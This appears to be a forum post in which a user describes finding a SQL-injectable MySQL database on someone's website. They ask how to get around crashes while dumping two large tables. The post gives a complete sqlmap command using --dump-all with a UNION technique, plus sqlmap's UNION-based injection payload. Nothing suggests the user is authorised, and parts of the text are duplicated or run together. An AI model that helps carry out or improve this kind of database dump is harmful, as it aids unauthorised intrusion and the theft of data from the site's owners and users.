Hello, so I have a small query, so I found this vulnerable MySQL DB on a website, tested it manually and then used SQLMap to get more details of the database, there is one primary large database that I am interested in dumping, I listed the individual tables and then decided to go with --dump-all in order to dump the entire database, however there are some large tables with multiple columns whenever its turn for them to be dumped, either SQLMap crashes/ gets stuck or the connection breaks, I have tried increasing the timsec value, tried different techniques, but for some reason on those two large tables, I can't seem to dump them, what are my other options? Is there an alternative tool that can dump the database in a more stable manner, another feature in SQLMap that I can use or I might be missing?
Any help and guidance would be appreciated, thanks.
The command that I am using is
The response from sqlmap
Any help and guidance would be appreciated, thanks.
The command that I am using is
sqlmap -u "https://<target.com>\injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 10 --time-sec 10000 --technique=uThe response from sqlmap
Код:
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=1234 UNION ALL SELECT NULL,NULL,CONCAT(0x7178707871,0x54476d786d495070795750686b4e557155564d6277444a6857427466704b707a7167615877644476,0x7171766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -